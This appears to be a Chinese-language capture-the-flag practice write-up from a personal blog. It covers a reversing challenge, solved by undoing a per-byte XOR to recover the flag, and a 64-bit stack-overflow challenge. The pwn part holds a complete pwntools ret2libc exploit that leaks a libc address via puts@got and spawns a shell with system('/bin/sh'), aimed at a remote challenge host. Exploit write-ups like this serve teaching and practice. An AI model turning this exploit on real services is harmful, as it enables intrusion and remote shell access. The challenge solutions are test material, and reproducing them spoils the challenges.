
随便做的练习

writeup-1-练习

简单的re

/*
 * Decompiled (IDA-style pseudo-code) entry point of the "re" challenge.
 *
 * Behaviour visible in the listing: read a string, XOR every byte of it in
 * place with a running key that starts at 34 (0x22) and increments by one
 * per byte, then compare the first 0x16 (22) bytes against the constant
 * szCmp and print "right" / "wrong".
 *
 * Review notes:
 *   - scanf("%s") has no length bound, so the 0x60-byte buffer v10 can be
 *     overrun by a long input. The __readfsqword(0x28) load into v12 is the
 *     stack-canary prologue, so an overrun would be caught at return rather
 *     than silently hijacking control flow.
 *   - The do/while below is the compiler's exact zero-byte test:
 *     ~w & (w - 0x01010101) & 0x80808080 is non-zero iff one of the four
 *     bytes of w is 0. Together with the two fix-up ifs it is an inlined
 *     strlen() over v10 and contributes nothing to the transform itself.
 *   - memcmp only checks 22 bytes, so any input whose first 22 transformed
 *     bytes match is accepted regardless of what follows.
 */
int __cdecl main(int argc, const char **argv, const char **envp)
{
    int v3; // edi  -- running XOR key, 34 for byte 0, 35 for byte 1, ...
    unsigned __int64 i; // rsi  -- index of the byte currently being transformed
    int *v5; // rdx  -- 4-byte cursor used by the inlined strlen()
    int v6; // ecx  -- last 4-byte word read by the cursor
    unsigned int v7; // eax  -- zero-byte mask for v6
    __int64 v8; // rdx
    __int64 v10; // [rsp+0h] [rbp-78h]  -- 0x60-byte input buffer (declared as one __int64 by the decompiler)
    int v11; // [rsp+60h] [rbp-18h]  -- sits right after the buffer; zeroed so a full 0x60-byte input stays terminated
    unsigned __int64 v12; // [rsp+68h] [rbp-10h]  -- stack canary copy

    v12 = __readfsqword(0x28u);                       /* load canary from TLS */
    _printf_chk(1LL, "input:", envp);
    memset(&v10, 0, 0x60uLL);
    v11 = 0;
    scanf("%s", &v10);                                /* unbounded read into a 0x60-byte buffer */
    v3 = 34;                                          /* key for index 0 */
    for ( i = 0LL; ; ++i )
    {
        /* --- inlined strlen(&v10): scan one 4-byte word at a time --- */
        v5 = (int *)&v10;
        do
        {
            v6 = *v5;
            ++v5;
            v7 = ~v6 & (v6 - 16843009) & 0x80808080;   /* 16843009 == 0x01010101 */
        }
        while ( !v7 );
        /* zero byte found in the upper half-word: adjust mask and cursor */
        if ( !(~v6 & (v6 - 16843009) & 0x8080) )
            v7 >>= 16;
        if ( !(~v6 & (v6 - 16843009) & 0x8080) )
            v5 = (int *)((char *)v5 + 2);
        /* equivalent to: if ( i >= strlen(&v10) ) break; */
        if ( i >= (char *)v5 - __CFADD__((_BYTE)v7, (_BYTE)v7) - 3 - (char *)&v10 )
            break;
        /* the entire transform: input[i] ^= 34 + i */
        *((_BYTE *)&v10 + i) ^= v3++;
    }
    /* only the first 22 bytes are compared */
    if ( !memcmp(&szCmp, &v10, 0x16uLL) )
        _printf_chk(1LL, "right\n", v8);
    else
        _printf_chk(1LL, "wrong\n", v8);
    return 0;
}

刚看以为很复杂，后来发现前面那段 do/while 只是编译器内联的 strlen（用来算输入长度），真正的变换只有一行 `input[i] ^= 34 + i`，而且 memcmp 只比较前 0x16 = 22 字节。异或是自逆的，所以把 szCmp 的 22 字节用同样的 key 逐个异或回去就能得到 flag。

#!/usr/bin/env python
# coding=utf-8
# Undo the challenge's transform. The binary computes input[i] ^= 34 + i
# (34 == 0x22) before comparing 22 bytes against a constant; XOR is its own
# inverse, so applying the same per-index key to that constant gives the flag.
List = [0x44, 0x4F, 0x45, 0x42, 0x5D, 0x1E, 0x1B, 0x19, 0x43, 0x7E, 0x61, 0x1F, 0x61, 0x59, 0x7B, 0x76, 0x78, 0x65, 0x0C, 0x03, 0x41, 0x4A]
flag = "".join(chr(byte ^ (0x22 + idx)) for idx, byte in enumerate(List))

print(flag)

pwn

/*
 * Decompiled vulnerable function from the "pwn" challenge.
 *
 * The frame puts buf at rbp-0x70 and v2 at rbp-0x10, so the region cleared
 * by memset is 0x60 bytes, yet read() accepts up to 0x400 bytes: a plain
 * stack buffer overflow. No __readfsqword canary load appears in this
 * pseudo-code, so saved rbp and the return address begin 0x70 + 8 = 120
 * bytes into the input, which is the offset the exploit below uses.
 *
 * read() does not NUL-terminate. v2 = 0 only provides four zero bytes right
 * after the 0x60-byte region, so an input that overwrites those too lets
 * printf("%s") run past the buffer and echo stack contents back.
 */
int vul()
{
    char buf; // [rsp+0h] [rbp-70h]  -- decompiler shows one char; the memset size says it is a 0x60-byte array
    int v2; // [rsp+60h] [rbp-10h]  -- the 4 bytes immediately after buf

    memset(&buf, 0, 0x60uLL);
    v2 = 0;
    puts("input your name:");
    read(0, &buf, 0x400uLL);                           /* up to 0x400 bytes into 0x60: stack overflow */
    return printf("hi,%s welcome to shanxi~!\n", &buf); /* %s over a buffer read() never terminated */
}

简单的 64 位栈溢出：buf 在 rbp-0x70，反编译里没有看到 canary，read 却最多读 0x400 字节，所以覆盖返回地址的 offset 是 0x70 + 8 = 120。开头 ROPgadget 工具坏了，折腾了一小会儿才找到 pop rdi; ret，之后的 exp 很简单：先用 puts(puts@got) 泄露 libc 地址，再回到 vul 做第二次溢出调 system("/bin/sh")。

#!/usr/bin/env python2
# -*- coding: utf-8 -*-
from pwn import *
# Toggle between a local process (with debug logging) and the remote service.
local = False
exe = './pwn'
host, port = '123.59.204.3', 3333

# Loading the target also sets context (arch, bits, endianness) from its header.
elf = context.binary = ELF(exe)

# Debug logging only for the local run, so every byte on the tube is shown
# while developing; the remote run stays quiet.
if local:
    context.log_level = 'debug'
io = process(exe) if local else remote(host, port)

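def exp():
    """Two-stage ret2libc against vul().

    Stage 1 overflows the 0x60-byte buffer and calls puts(puts@got) to leak
    a libc address, returning into the program again for a second read.
    Stage 2 overflows once more and calls system("/bin/sh").

    Uses the module-level ``io`` (tube) and ``elf`` (target binary); the
    provided ./libc.so.6 must match the remote libc for the offsets to hold.
    Raises RuntimeError when the leaked address cannot be from that libc.
    """
    libc = ELF("./libc.so.6")
    pop_rdi = 0x0000000000400863      # pop rdi ; ret
    puts_got = elf.got['puts']
    puts_plt = elf.plt['puts']
    # Address to return to after the leak; presumably vul()/main so a second
    # read() happens -- confirm against the binary if stage 2 never triggers.
    ret_addr = 0x0000000000400776
    # buf is at rbp-0x70 and no canary is visible in vul(), so saved rbp and
    # the return address start 0x70 + 8 = 120 bytes into the input.
    offset = 120

    # Stage 1: leak puts@libc, then re-enter the vulnerable function.
    payload = 'a' * offset + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(ret_addr)
    io.sendline(payload)
    io.recvuntil("welcome to shanxi~!\n")
    # Take exactly the 6 significant bytes of the address. recvline().strip()
    # would also strip an address byte that happens to be whitespace
    # (0x09, 0x0a, 0x0d, 0x20, ...) and silently corrupt the leak.
    puts_addr = u64(io.recv(6).ljust(8, '\x00'))
    io.success("puts_addr: 0x%x" % puts_addr)

    # Sanity check: the low 12 bits of a libc symbol survive ASLR, so they
    # must equal the ones in ./libc.so.6; otherwise the libc is wrong or the
    # tube is desynchronised and every derived address below is garbage.
    if (puts_addr & 0xfff) != (libc.symbols['puts'] & 0xfff):
        io.failure("leak 0x%x does not match ./libc.so.6 puts; wrong libc?" % puts_addr)
        raise RuntimeError("libc leak sanity check failed")

    libc_base = puts_addr - libc.symbols['puts']
    system_addr = libc_base + libc.symbols['system']
    bin_sh_addr = libc_base + next(libc.search("/bin/sh"))   # next() works on py2 and py3
    io.info("libc_base: 0x%x" % libc_base)

    # Stage 2: system("/bin/sh"). If system() faults on a movaps stack
    # alignment check (newer glibc), insert a plain `ret` gadget before
    # pop_rdi to realign the stack.
    payload = 'a' * offset + p64(pop_rdi) + p64(bin_sh_addr) + p64(system_addr)
    io.sendline(payload)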



def main():
    """Run both exploit stages, then hand the spawned shell to the user."""
    exp()
    io.interactive()


if __name__ == "__main__":
    main()

本文作者:NoOne
本文地址：https://noonegroup.xyz/posts/8cd80461/
版权声明:转载请注明出处!